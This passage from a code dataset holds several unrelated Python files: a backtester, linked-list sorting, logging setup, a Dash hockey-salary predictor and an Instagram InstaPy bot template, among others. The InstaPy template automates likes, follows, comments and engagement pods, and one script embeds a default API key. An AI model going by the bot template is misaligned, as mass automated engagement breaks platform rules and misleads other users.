print(\"compiling...\")\n output = subprocess.check_output([\"make\", \"-C\", SRC_CODE_DIR_PATH])\n\n for i in range(0, num_data_points):\n if (i % 100) == 0:\n print(\"Iteration %d\" % (i))\n\n test_str = GenRandString(str_length)\n test_weight = GetStrHammingWeight(test_str)\n h_weights.append(test_weight)\n start_time = time.time()\n output = subprocess.check_output([cmd, \"-g\", test_str])\n end_time = time.time()\n times.append((end_time - start_time))\n \n plt.scatter(h_weights, times, color=\"red\")\n plt.show()\n\n# Main\nif __name__ == \"__main__\":\n Sha256HammingWeightDurationTest()\n","repo_name":"ErikAlsterlind/Crypto","sub_path":"Python/PerformanceTestSha256.py","file_name":"PerformanceTestSha256.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29851242861","text":"from datetime import date, timedelta\nfrom dateutil.parser import parse\nfrom hashlib import sha256\nimport logging\nfrom os.path import join, isfile\nfrom os import makedirs\nfrom sys import stdout\nfrom typing import List, Dict\n\nimport pandas as pd\n\nfrom data.util import get_data_folder, load_adjusted_price, \\\n load_fundamental_dataframe, load_benchmark\nfrom data.config import FUNDAMENTAL_PUBLISH_DELAY\nfrom core.util import get_logger\n\n\nclass DataManager:\n\n def create_price_dataframe(self, start_date: date, end_date: date, \\\n universe: List[str], strategy):\n\n run_id = ' '.join([start_date.isoformat(), end_date.isoformat(), \n ''.join(universe)])\n file_key = sha256(run_id.encode()).hexdigest()\n file_path = join(get_data_folder()['price'], file_key + '.csv')\n \n if isfile(file_path):\n self.logger.info('found existing cached price data')\n return pd.read_csv(file_path, index_col='date', parse_dates=['date'])\n\n dataframe = None\n for idx, ticker in enumerate(universe):\n df = load_adjusted_price(fsym_id=ticker, start_date=start_date,\n end_date=end_date, adjustment_method='f')\n\n stdout.write('\\rloaded [%d / %d] prices' % (idx + 1, len(universe)))\n stdout.flush()\n\n if idx == 0:\n dataframe = df\n continue\n dataframe = dataframe.join(df, how='outer')\n \n dataframe = dataframe.round(decimals=2)\n dataframe.index = pd.to_datetime(dataframe.index)\n dataframe.sort_index(inplace=True)\n dataframe.fillna(inplace=True, method='pad')\n dataframe.to_csv(file_path)\n return dataframe\n\n\n def create_fundamental_dataframe(self, start_date: date, \n end_date: date, universe: List[str], strategy):\n \n required_fields = sorted(strategy.required_fields())\n # return empty dataframe if this is a pure price based strategy\n if len(required_fields) == 0:\n return pd.DataFrame() \n\n run_id = ' '.join([start_date.isoformat(), end_date.isoformat(), \n ''.join(universe), ','.join(sorted(required_fields))])\n file_key = sha256(run_id.encode()).hexdigest()\n file_path = join(get_data_folder()['fundamental'], file_key + '.csv')\n\n if isfile(file_path):\n self.logger.info('found existing cached fundamental data')\n return pd.read_csv(file_path, parse_dates=True, \n index_col=['date', 'fsym_id'])\n\n dataframe = load_fundamental_dataframe(fsym_ids=universe, \n period='q', factset_fields=required_fields)\n dataframe.to_csv(file_path)\n return dataframe\n\n\n def __init__(self, logger=None, *args, **kwargs):\n self.DATAFRAMES = {}\n self.current_row_index = None\n self.logger = logger or get_logger('DataManager', logging.WARNING)\n \n\n def setup(self, start_date: date, end_date: date, \n universe: List[str], strategy) -> None:\n \n self.DATAFRAMES['price'] = self.create_price_dataframe(\n start_date=start_date, end_date=end_date, \n universe=universe, strategy=strategy)\n self.DATAFRAMES['fundamental'] = self.create_fundamental_dataframe(\n start_date=start_date, end_date=end_date, \n universe=universe, strategy=strategy)\n if strategy.benchmark is None:\n self.DATAFRAMES['benchmark'] = None\n else: \n benchmark_dataframe = load_benchmark(strategy.benchmark)\n benchmark_dataframe = benchmark_dataframe.loc[start_date: end_date, :]\n self.DATAFRAMES['benchmark'] = benchmark_dataframe\n\n\n def get_market_data(self, as_of_date: date) -> Dict:\n data = {}\n for db_type, dataframe in self.DATAFRAMES.items():\n if db_type == 'price':\n price_dataframe = dataframe[dataframe.index <= as_of_date]\n # in case some stocks are listed after as_of date, \n # their price will all be nan, we filter them out\n # to avoid look ahead bias\n listed_tickers = price_dataframe.notna().any()\n data[db_type] = price_dataframe.loc[:, listed_tickers]\n elif db_type == 'fundamental':\n # due to the lag between fiscal period end and the\n # actual publish date of fundamental date we add a \n # conservative lag here to avoid look ahead bias\n visible_date = as_of_date - timedelta(days=FUNDAMENTAL_PUBLISH_DELAY)\n data[db_type] = dataframe.loc[pd.IndexSlice[:visible_date,:]]\n return data\n \n\n def get_prices_for_date(self, as_of_date: date) -> pd.Series:\n price = self.DATAFRAMES['price']\n return price[price.index <= as_of_date].iloc[-1, :].squeeze()\n \n \n def get_ticker_price_for_date(self, ticker: str, as_of_date: date) -> float:\n return self.DATAFRAMES['price'][ticker].loc[as_of_date]","repo_name":"fricative/backtester","sub_path":"backtester/data/data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":5095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2823688441","text":"# Bubble sort techniques to sort the singly linked list.\nprint()\n\nclass Node():\n def __init__(self,data):\n self.data=data\n self.next=None\n \nclass Linked_list():\n def __init__(self):\n self.start=None\n self.count=1\n \n def Insert_Node(self,data):\n temp=Node(data)\n if self.start==None:\n self.start=temp\n else:\n ptr=self.start\n while ptr.next!=None:\n ptr=ptr.next\n ptr.next=temp\n self.count+=1\n \n def Bubble_Sort(self):\n if self.start==None:\n print('\\nLinked List is Empty')\n else:\n curr=self.start\n index=None\n temp=None\n while curr!=None:\n index=curr.next\n while index!=None:\n if curr.data>index.data:\n temp=curr.data\n curr.data=index.data\n index.data=temp\n index=index.next\n curr=curr.next\n\n def Display(self):\n if self.start==None:\n print('\\nLinked List is Empty')\n else:\n x=self.start\n while x!=None:\n print(x.data,end='->')\n x=x.next\n \n\nif __name__ == \"__main__\":\n LL=Linked_list()\n print()\n while True:\n print('\\n============')\n print('1: Insert Node')\n print('2: Sort Linked List')\n print('3: Display')\n print('4: Exit')\n ch=int(input(\"Enter Your Choice: \"))\n\n if ch==1:\n item=int(input(\"Enter the Element: \"))\n LL.Insert_Node(item)\n elif ch==2:\n LL.Bubble_Sort()\n elif ch==3:\n LL.Display()\n elif ch==4:\n quit()\n else:\n print('\\nInvalid Choice')","repo_name":"puneet4840/Data-Structure-and-Algorithms","sub_path":"Linked List in Python/1 - Singly Linked List/15 - Sorting Singly Linked List.py","file_name":"15 - Sorting Singly Linked List.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71047332268","text":"\nimport logging\nfrom logging import CRITICAL, ERROR, WARNING, INFO, DEBUG\n\nfrom py.utility import color\n\nlevel_colors = {\n CRITICAL : color.magenta,\n ERROR : color.red,\n WARNING : color.yellow,\n INFO : color.green,\n DEBUG : color.white,\n}\n\nlevel_names = {\n CRITICAL : \"CRITI\",\n ERROR : \"ERROR\",\n WARNING : \"WARN\",\n INFO : \"INFO\",\n DEBUG : \"DEBUG\",\n}\n\ndef levelname(level):\n return level_colors.get(level, color)(level_names.get(level, \"NOTSET\"))\n\nCRITICAL_NAME = levelname(CRITICAL)\nERROR_NAME = levelname(ERROR)\nWARNING_NAME = levelname(WARNING)\nINFO_NAME = levelname(INFO)\nDEBUG_NAME = levelname(DEBUG)\n\nclass LogRecord(logging.LogRecord):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.msecs_int = int(self.msecs)\n self.levelname = level_colors.get(self.levelno, color)(f\"{level_names.get(self.levelno, ''):>5}\")\n\ndef config(filter_names):\n handlers = []\n for filter_name in filter_names:\n handler = logging.StreamHandler()\n handler.addFilter(logging.Filter(filter_name))\n handlers.append(handler)\n\n logging.basicConfig(\n format=\"[{asctime}.{msecs_int:03}][{levelname}][{name}][{filename:16.16}{lineno:>4}]: {msg}\",\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n style=\"{\",\n handlers=handlers)\n logging.setLogRecordFactory(LogRecord)\n\ndef get(name):\n return logging.getLogger(name)\n\ndef main():\n logger = get(__name__)\n logger.info(\"help2\")","repo_name":"centixkadon/tools","sub_path":"py/utility/loggers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37447977773","text":"\"\"\"\n#https://leetcode.com/problems/two-city-scheduling/\n\n\nThere are 2N people a company is planning to interview. The cost of flying the i-th person to city A is costs[i][0],\n and the cost of flying the i-th person to city B is costs[i][1].\n\nReturn the minimum cost to fly every person to a city such that exactly N people arrive in each city.\n\"\"\"\n\nclass Solution:\n def twoCitySchedCost(self, costs: List[List[int]]) -> int:\n ans = 0\n for i in costs:\n q = abs(i[0] - i[1])\n i.append(q)\n\n cos = sorted(costs, key=lambda x: x[2], reverse=True)\n print(cos)\n\n ta1 = 0\n ta2 = 0\n\n z = 0\n z1 = len(cos) // 2\n while (z < len(cos)):\n if cos[z][0] > cos[z][1]:\n if ta2 < z1:\n ans = ans + cos[z][1]\n ta2 += 1\n else:\n ans = ans + cos[z][0]\n ta1 += 1\n else:\n if ta1 < z1:\n ans = ans + cos[z][0]\n ta1 += 1\n else:\n ans = ans + cos[z][1]\n ta2 += 1\n z += 1\n\n return ans\n\n\n","repo_name":"SurajPatil314/Leetcode-problems","sub_path":"greedy_2cityscheduling.py","file_name":"greedy_2cityscheduling.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20988838956","text":"import numpy as np\n\n\ndef minEditDistance(sourceString, targetString):\n rows = len(sourceString) + 1\n cols = len(targetString) + 1\n dist = np.zeros((rows + 1, cols + 1))\n for i in range(1, rows):\n dist[i][0] = i\n for i in range(1, cols):\n dist[0][i] = i\n\n for col in range(1, cols):\n for row in range(1, rows):\n if sourceString[row - 1] == targetString[col - 1]:\n cost = 0\n else:\n cost = 2\n dist[row][col] = min(dist[row - 1][col] + 1, # deletion\n dist[row][col - 1] + 1, # insertion\n dist[row - 1][col - 1] + cost) # substitution\n\n return dist[row][col]\n\n\ndef run():\n sourceString = input('Enter source string: ')\n targetString = input('Enter target string: ')\n med = minEditDistance(str(sourceString), str(targetString))\n print('The min edit distance between \"' + str(sourceString) + '\" and \"' + str(targetString) + '\" is ' + str(med))\n\nrun()\n","repo_name":"OlukoyaDaniel/NLP-18-OlukoyaDaniel","sub_path":"lab2/editDistance.py","file_name":"editDistance.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72700710507","text":"from searching_framework.utils import Problem\nfrom searching_framework.uninformed_search import *\n\n\n\nclass Search(Problem):\n def __init__(self, initial,goal=None):\n super().__init__(initial,goal)\n self.goal_size = [6,4]\n\n\n def successor(self, state):\n\n successors = dict()\n\n pacman_x = state[0]\n pacman_y = state[1]\n obstacle1 = [state[2],state[3],state[4]]\n obstacle2 = [state[5],state[6],state[7]]\n\n\n #Dvizejne na preckite\n\n if obstacle1[2] == 1: #desno\n if obstacle1[0] == 6:\n obstacle1[2] = 0\n obstacle1[0] -= 1\n else:\n obstacle1[0] += 1\n else: #levo\n if obstacle1[0] == 0:\n obstacle1[2] = 1\n obstacle1[0] += 1\n else:\n obstacle1[0] -= 1\n\n if obstacle2[2] == 1: #gore\n if obstacle2[1] == 5:\n obstacle2[2] = 0\n obstacle2[1] -= 1\n else:\n obstacle2[1] += 1\n else: #dolu\n if obstacle2[1] == 0:\n obstacle2[2] = 1\n obstacle2[1] += 1\n else:\n obstacle2[1] -= 1\n\n obstacles = [[obstacle1[0],obstacle1[1]],[obstacle2[0],obstacle2[1]]]\n\n if 0 <= pacman_x+1 < 7 and [pacman_x + 1, pacman_y] not in obstacles: #move right\n successors['Desno'] = (pacman_x + 1, pacman_y, obstacle1[0], obstacle1[1], obstacle1[2],\n obstacle2[0], obstacle2[1], obstacle2[2])\n\n if 0 <= pacman_x-1 < 7 and [pacman_x - 1, pacman_y] not in obstacles: #move left\n successors['Levo'] = (pacman_x - 1, pacman_y, obstacle1[0], obstacle1[1], obstacle1[2],\n obstacle2[0], obstacle2[1], obstacle2[2])\n\n if 0 <= pacman_y + 1 < 7 and [pacman_x , pacman_y + 1] not in obstacles: #move up\n successors['Gore'] = (pacman_x,pacman_y + 1,obstacle1[0],obstacle1[1],obstacle1[2],\n obstacle2[0],obstacle2[1],obstacle2[2])\n\n if 0 <= pacman_y - 1 < 7 and [pacman_x , pacman_y - 1] not in obstacles: #move down\n successors['Dolu'] = (pacman_x,pacman_y - 1,obstacle1[0],obstacle1[1],obstacle1[2],\n obstacle2[0],obstacle2[1],obstacle2[2])\n\n\n\n return successors\n\n def actions(self, state):\n\n return self.successor(state).keys()\n\n def result(self, state, action):\n\n return self.successor(state)[action]\n\n\n def goal_test(self, state):\n\n position = (state[0],state[1])\n\n return position == self.goal\n\nif __name__ == '__main__':\n goal_state = (6,4)\n initial_state = (0,0)\n\n obstacle_1 = (2, 2, 0) # left - Right\n obstacle_2 = (4, 5, 0) # up - down\n\n exp = Search((initial_state[0],initial_state[1],\n obstacle_1[0],obstacle_1[1],obstacle_1[2],\n obstacle_2[0],obstacle_2[1],obstacle_2[2]),goal_state)\n\n result = breadth_first_graph_search(exp)\n print(result.solution())\n print(result.solve())","repo_name":"tosek4/Vestacka_Intelegencija","sub_path":"Ex.2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17926664012","text":"import os\n\ndef main():\n commands = [[command[0], int(command[1])] for command in [line.split() for line in open('input.txt', 'r').readlines()]]\n\n partOne(commands)\n partTwo(commands)\n \n\ndef partOne(commands):\n horizontalPos = 0\n depth = 0\n\n for command in commands:\n direction = command[0]\n value = command[1]\n \n if direction == 'forward': horizontalPos += value\n elif direction == 'up': depth -= value\n elif direction == 'down': depth += value\n\n print(depth * horizontalPos)\n\n\ndef partTwo(commands):\n horizontalPos = 0\n depth = 0\n aim = 0\n\n for command in commands:\n direction = command[0]\n value = command[1]\n \n if direction == 'forward':\n horizontalPos += value\n depth += (aim * value)\n elif direction == 'up': aim -= value\n elif direction == 'down': aim += value\n\n\n print(depth * horizontalPos)\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"whiskermrr/advent-of-code-2021","sub_path":"day02/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20024715901","text":"\"\"\"\nThis template is written by @Nocturnal-2\n\nWhat does this quickstart script aim to do?\n- I do some unfollow and like by tags mostly\n\nNOTES:\n- I am an one month old InstaPy user, with a small following. So my numbers\nin settings are bit conservative.\n\"\"\"\n\nfrom instapy import InstaPy\nfrom instapy import smart_run\n\n# get a session!\nsession = InstaPy(username='', password='')\n\n# let's go! :>\nwith smart_run(session):\n \"\"\" Start of parameter setting \"\"\"\n # don't like if a post already has more than 150 likes\n session.set_delimit_liking(enabled=True, max=150, min=0)\n\n # don't comment if a post already has more than 4 comments\n session.set_delimit_commenting(enabled=True, max=4, min=0)\n\n \"\"\"I used to have potency_ratio=-0.85 and max_followers=1200 for \n set_relationship_bounds()\n Having a stricter relationship bound to target only low profiles \n users was not very useful,\n as interactions/sever calls ratio was very low. I would reach the \n server call threshold for\n the day before even crossing half of the presumed safe limits for \n likes, follow and comments (yes,\n looks like quiet a lot of big(bot) managed accounts out there!!).\n So I relaxed it a bit to -0.50 and 2000 respectively.\n \"\"\"\n session.set_relationship_bounds(enabled=True,\n potency_ratio=-0.50,\n delimit_by_numbers=True,\n max_followers=2000,\n max_following=3500,\n min_followers=25,\n min_following=25)\n session.set_do_comment(True, percentage=20)\n session.set_do_follow(enabled=True, percentage=20, times=2)\n session.set_comments(['Amazing!', 'Awesome!!', 'Cool!', 'Good one!',\n 'Really good one', 'Love this!', 'Like it!',\n 'Beautiful!', 'Great!', 'Nice one'])\n session.set_sleep_reduce(200)\n\n \"\"\" Get the list of non-followers\n I duplicated unfollow_users() to see a list of non-followers which I \n run once in a while when I time\n to review the list\n \"\"\"\n # session.just_get_nonfollowers()\n\n # my account is small at the moment, so I keep smaller upper threshold\n session.set_quota_supervisor(enabled=True,\n sleep_after=[\"likes\", \"comments_d\", \"follows\",\n \"unfollows\", \"server_calls_h\"],\n sleepyhead=True, stochastic_flow=True,\n notify_me=True,\n peak_likes=(100, 700),\n peak_comments=(25, 200),\n peak_follows=(48, 125),\n peak_unfollows=(35, 400),\n peak_server_calls=(None, 3000))\n \"\"\" End of parameter setting \"\"\"\n\n \"\"\" Actions start here \"\"\"\n # Unfollow users\n \"\"\" Users who were followed by InstaPy, but not have followed back will \n be removed in\n One week (168 * 60 * 60)\n Yes, I give a liberal one week time to follow [back] :)\n \"\"\"\n session.unfollow_users(amount=25, InstapyFollowed=(True, \"nonfollowers\"),\n style=\"RANDOM\",\n unfollow_after=168 * 60 * 60,\n sleep_delay=600)\n\n # Remove specific users immediately\n \"\"\" I use InstaPy only for my personal account, I sometimes use custom \n list to remove users who fill up my feed\n with annoying photos\n \"\"\"\n # custom_list = [\"sexy.girls.pagee\", \"browneyedbitch97\"]\n #\n # session.unfollow_users(amount=20, customList=(True, custom_list,\n # \"all\"), style=\"RANDOM\",\n # unfollow_after=1 * 60 * 60, sleep_delay=200)\n\n # Like by tags\n \"\"\" I mostly use like by tags. I used to use a small list of targeted \n tags with a big 'amount' like 300\n But that resulted in lots of \"insufficient links\" messages. So I \n started using a huge list of tags with\n 'amount' set to something small like 50. Probably this is not the \n best way to deal with \"insufficient links\"\n message. But I feel it is a quick work around.\n \"\"\"\n\n session.like_by_tags(['tag1', 'tag2', 'tag3', 'tag4'], amount=300)\n\n \"\"\" Joining Engagement Pods...\n \"\"\"\n session.join_pods(topic='fashion')\n\n\"\"\"\n-- REVIEWS --\n\n@uluQulu:\n- @Nocturnal-2, your template looks stylish, thanks for preparing it.\n\n@nocturnal-2:\n- I think it is good opportunity to educate and get educated [using templates of other people] :) ...\n\n\"\"\"\n","repo_name":"InstaPy/instapy-quickstart","sub_path":"quickstart_templates/stylish_unfollow_tips_and_like_by_tags.py","file_name":"stylish_unfollow_tips_and_like_by_tags.py","file_ext":"py","file_size_in_byte":4725,"program_lang":"python","lang":"en","doc_type":"code","stars":740,"dataset":"github-code","pt":"37"} +{"seq_id":"15496827196","text":"import nengo\n\nfrom adder_env import create_adder_env\nfrom constants import *\n\nq_list = [(0,0,0,1), (0,0,1,0), (0,1,0,0), (1,0,0,0)]\nans_list = [(-1,1), (1,-1), (1,1), (-1,-1)]\n\nwith nengo.Network(label=\"test\") as model:\n env = create_adder_env(q_list, ans_list, (1,))\n\n # questions and op_state are given at the correct interval\n # and are swapped once an answer is given\n q_node = nengo.Node(size_in=D*2)\n op_node = nengo.Node(size_in=1)\n\n # input is given constantly throughout\n in_node = nengo.Node(size_in=D*2)\n\n def ans_func(t):\n if t < 0.1:\n return 0, 0\n elif t < 0.45:\n return -1, 1\n elif t < 0.6:\n return 0, 0\n elif t < 0.95:\n return 1, -1\n elif t < 1.0:\n return 0, 0\n elif t < 1.35:\n return 1, 1\n elif t < 1.8:\n return 0, 0\n elif t < 2.15:\n return -1, -1\n elif t < 2.2:\n return 0, 0\n elif t < 2.55:\n return ans_list[env.env_cls.list_index + 1]\n elif t < 2.6:\n return 0, 0\n elif t < 2.95:\n return ans_list[env.env_cls.list_index]\n else:\n return 0, 0\n\n # answers can be given at different intervals\n ans_in = nengo.Node(ans_func)\n\n # the correct answer is returned\n ans_out = nengo.Node(size_in=D)\n\n # learning is maintained for a given interval\n learn_node = nengo.Node(size_in=1)\n\n nengo.Connection(env.q_in, q_node, synapse=None)\n nengo.Connection(env.op_in, op_node, synapse=None)\n nengo.Connection(env.env_keys, in_node, synapse=None)\n nengo.Connection(ans_in, env.set_ans, synapse=None)\n nengo.Connection(env.get_ans, ans_out, synapse=None)\n nengo.Connection(env.learning, learn_node, synapse=None)\n\n p_q = nengo.Probe(env.q_in, synapse=None)\n p_op = nengo.Probe(env.op_in, synapse=None)\n p_keys = nengo.Probe(env.env_keys, synapse=None)\n p_ans = nengo.Probe(env.get_ans, synapse=None)\n p_learn = nengo.Probe(env.learning, synapse=None)\n p_gate = nengo.Probe(env.gate, synapse=None)\n\n p_in = nengo.Probe(ans_in, synapse=None)\n\nsim = nengo.Simulator(model, dt=dt)\nsim.run(3.0)\n","repo_name":"Seanny123/counting_to_addition","sub_path":"tests/env_test.py","file_name":"env_test.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"19806002754","text":"import numpy as np\nimport pdb\nimport os\n\ndirectories = os.listdir(\"/home/kendall/Development/nba-basketball-db/advanced-seasons/\")\n\nfor d in directories:\n if d != \"2012\":\n files = os.listdir(\"/home/kendall/Development/nba-basketball-db/advanced-seasons/\"+d)\n for f in files:\n data = np.genfromtxt(\"/home/kendall/Development/nba-basketball-db/advanced-seasons/\"+d+\"/\"+f, delimiter=\",\")\n\n if data.shape[0] == 47:\n continue\n\n # if d == \"2017\" and f == \"Golden-State.csv\":\n # pdb.set_trace()\n # print\n\n try:\n data = data[::-1,:]\n except:\n pdb.set_trace()\n print\n\n accumulated_data = []\n for row in range(1,data.shape[0]+1):\n # accumulated_data.append(np.mean(data[0:row,:], axis=0))\n row_data = []\n for column in range(data.shape[1]):\n # if column != 0 and column != 46 and column != 43:\n if column != 0 and column != 29 and column != 32:\n row_data.append(np.mean(data[0:row,column]))\n else:\n row_data.append(data[row-1,column])\n accumulated_data.append(row_data)\n\n accumulated_data = np.array(accumulated_data)[::-1,:]\n\n try:\n os.mkdir(\"/home/kendall/Development/nba-basketball-db/advanced-accumulated/\"+d)\n except:\n pass\n np.savetxt(\"/home/kendall/Development/nba-basketball-db/advanced-accumulated/\"+d+\"/\"+f, accumulated_data, delimiter=\",\")\n","repo_name":"KendallWeihe/basketball-db","sub_path":"accumulate-stats.py","file_name":"accumulate-stats.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70395663146","text":"# deque pronounced as deck is an optimised list to perform insertion and deletion easily.\nfrom collections import deque\n\na =['s','h','o','h','a','n']\nb = deque(a)\nb.append('uzzaman') #append function is used for adding element in any collection\nb.appendleft('md')\nprint(b)\nb.popleft() #pop() function is used for deleting element from collection and it also donot allow any argument inside it.\nb.pop()\nprint(b)","repo_name":"quietsos/Python_course","sub_path":"collection/deque.py","file_name":"deque.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17127392223","text":"\"\"\"\nQuick Use:\n python createIncidents.py --host http://localhost:16649 --plan demo-test-foo\n\nBy default, the above command will create an incident for the `foo` user.\n\nSet the `username` to `foo` in the IDE to receive these notifications.\n\"\"\"\nimport argparse\n\nfrom irisclient import IrisClient\n\n\ndef main(arguments: argparse.Namespace) -> None:\n print(f\"Base Hostname: {arguments.host}\")\n print(f\"Application: {arguments.app}\")\n print(f\"Key: *****{arguments.key[-5:]}\")\n print(f\"Plan Name: {arguments.plan}\")\n print()\n\n client = IrisClient(app=arguments.app, key=arguments.key, api_host=arguments.host)\n\n for x in range(arguments.count):\n print(f\"Creating incident {x + 1} of {arguments.count}...\")\n # create an incident\n resp = client.incident(arguments.plan, context={'count': x + 1, 'key-foo': 'abc', 'key-bar': 1})\n print(f'Incident ID: {resp}')\n # # send an adhoc notification\n # print(client.notification(role='user', target='alice', priority='urgent', subject='Yo'))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--host', help='The base hostname to request against', required=True)\n parser.add_argument('--key', help='The key to use for authenticating the Iris Client',\n default=\"a7a9d7657ac8837cd7dfed0b93f4b8b864007724d7fa21422c24f4ff0adb2e49\", required=False)\n parser.add_argument('--app', help='The application to use for the client', default=\"Autoalerts\", required=False)\n parser.add_argument('--plan', help='The plan to create an incident against', required=True)\n parser.add_argument('-c', '--count', help='The number of incidents to create', type=int, default=1)\n arguments = parser.parse_args()\n\n main(arguments)\n","repo_name":"ChrisCarini/iris-jetbrains-plugin","sub_path":"bin/createIncidents.py","file_name":"createIncidents.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"70909419309","text":"import dash\nfrom dash import html, Input, Output, dcc, callback\nimport dash_bootstrap_components as dbc\nimport pandas as pd\nimport pickle\n\nfrom .player_worth_func import *\n\ndash.register_page(__name__)\n\ndf = clean_data()\n\nwith open('model/rf_10_feats', 'rb') as f:\n clf = pickle.load(f)\n\nfirst_pass = True\ncareer_assists_slider_output = int()\ncareer_assists_input_output = int()\ncareer_points_slider_output = int()\ncareer_points_input_output = int()\ncareer_shots_slider_output = int()\ncareer_shots_input_output = int()\ncareer_timeOnIce_slider_output = int()\ncareer_timeOnIce_input_output = int()\ncareer_evenTimeOnIce_slider_output = int()\ncareer_evenTimeOnIce_input_output = int()\ncareer_powerPlayTimeOnIcePerGame_slider_output = int()\ncareer_powerPlayTimeOnIcePerGame_input_output = int()\ncareer_powerPlayTimeOnIce_slider_output = int()\ncareer_powerPlayTimeOnIce_input_output = int()\ncareer_powerPlayPoints_slider_output = int()\ncareer_powerPlayPoints_input_output = int()\npowerPlayTimeOnIcePerGame22_slider_output = int()\npowerPlayTimeOnIcePerGame22_input_output = int()\nassists22_slider_output = int()\nassists22_input_output = int()\n\ncolumn_one_map = {\n 'Career Assists': 'career_assists',\n 'Career Points': 'career_points',\n 'Career Shots': 'career_shots',\n 'Career TOI': 'career_timeOnIce',\n 'Career Even TOI': 'career_evenTimeOnIce'\n}\n\ncolumn_two_map = {\n 'Career PP TOI PG': 'career_powerPlayTimeOnIcePerGame',\n 'Career PP TOI': 'career_powerPlayTimeOnIce',\n 'Career PP Points': 'career_powerPlayPoints',\n 'PP TOI PG 2021-22': 'powerPlayTimeOnIcePerGame22',\n 'Total Assists 2021-22': 'assists22'\n}\n\ncolumn_one_layout = convert_dash_format([\n (add_header(header),\n add_slider_input(df, data))\n for header, data in column_one_map.items()\n])\n\ncolumn_two_layout = convert_dash_format([\n (add_header(header),\n add_slider_input(df, data))\n for header, data in column_two_map.items()\n])\n\nlayout = dbc.Container([\n dbc.Row(\n html.H2(\n 'Your Predicted Salary Is:',\n style={\n 'textAlign': 'center'\n }),\n className='my-5'\n ),\n dbc.Row(\n html.H1(\n id='basic_predicted_salary',\n style={\n 'textAlign': 'center'\n }),\n className='my-5'\n ),\n dbc.Row(\n dbc.Col(\n html.Hr(\n style={\n 'color': 'black',\n 'height': '5px',\n 'opacity': '100',\n }\n ),\n width=10,\n ),\n justify='center',\n ),\n dbc.Row([\n dbc.Col(\n column_one_layout,\n width=5,\n ),\n dbc.Col(\n column_two_layout,\n width=5,\n )\n ],\n justify='center',\n ),\n dbc.Row(\n dbc.Col([\n dbc.Row(\n html.H4(\n 'Legend',\n style={\n 'textAlign': 'center',\n 'text-decoration': 'underline'\n }\n ),\n ),\n dbc.Row(\n html.H5(\n 'PP: Power Play'\n )\n ),\n dbc.Row(\n html.H5(\n 'TOI: Time On Ice'\n )\n ),\n dbc.Row(\n html.H5(\n 'PG: Per Game'\n )\n )\n ],\n style={\n 'textAlign': 'center',\n 'border': '2px black solid'\n },\n className='my-5'\n )\n )\n])\n\nall_columns = {**column_one_map, **column_two_map}\n\ncallback_outputs = [\n (Output(f'{data}_slider', 'value'),\n Output(f'{data}_input', 'value'))\n for data in all_columns.values()\n]\n\ncallback_outputs = convert_dash_format(callback_outputs)\n\nprediction = Output('basic_predicted_salary', 'children')\ncallback_outputs = list((*callback_outputs, prediction))\n\ncallback_inputs = [\n (Input(f'{data}_slider', 'value'),\n Input(f'{data}_input', 'value'))\n for data in all_columns.values()\n]\n\ncallback_inputs = list(convert_dash_format(callback_inputs))\n\n\n@callback(\n callback_outputs,\n callback_inputs\n)\ndef basic_pred(career_assists_slider, career_assists_input, career_points_slider, career_points_input,\n career_shots_slider, career_shots_input, career_timeOnIce_slider, career_timeOnIce_input,\n career_evenTimeOnIce_slider, career_evenTimeOnIce_input, career_powerPlayTimeOnIcePerGame_slider,\n career_powerPlayTimeOnIcePerGame_input, career_powerPlayTimeOnIce_slider,\n career_powerPlayTimeOnIce_input, career_powerPlayPoints_slider,\n career_powerPlayPoints_input, powerPlayTimeOnIcePerGame22_slider,\n powerPlayTimeOnIcePerGame22_input, assists22_slider, assists22_input):\n global first_pass, \\\n career_assists_slider_output, \\\n career_assists_input_output, \\\n career_points_slider_output, \\\n career_points_input_output, \\\n career_shots_slider_output, \\\n career_shots_input_output, \\\n career_timeOnIce_slider_output, \\\n career_timeOnIce_input_output, \\\n career_evenTimeOnIce_slider_output, \\\n career_evenTimeOnIce_input_output, \\\n career_powerPlayTimeOnIcePerGame_slider_output, \\\n career_powerPlayTimeOnIcePerGame_input_output, \\\n career_powerPlayTimeOnIce_slider_output, \\\n career_powerPlayTimeOnIce_input_output, \\\n career_powerPlayPoints_slider_output, \\\n career_powerPlayPoints_input_output, \\\n powerPlayTimeOnIcePerGame22_slider_output, \\\n powerPlayTimeOnIcePerGame22_input_output, \\\n assists22_slider_output, \\\n assists22_input_output\n\n if first_pass:\n first_pass = False\n career_assists_slider_output = career_assists_slider\n career_assists_input_output = career_assists_input\n career_points_slider_output = 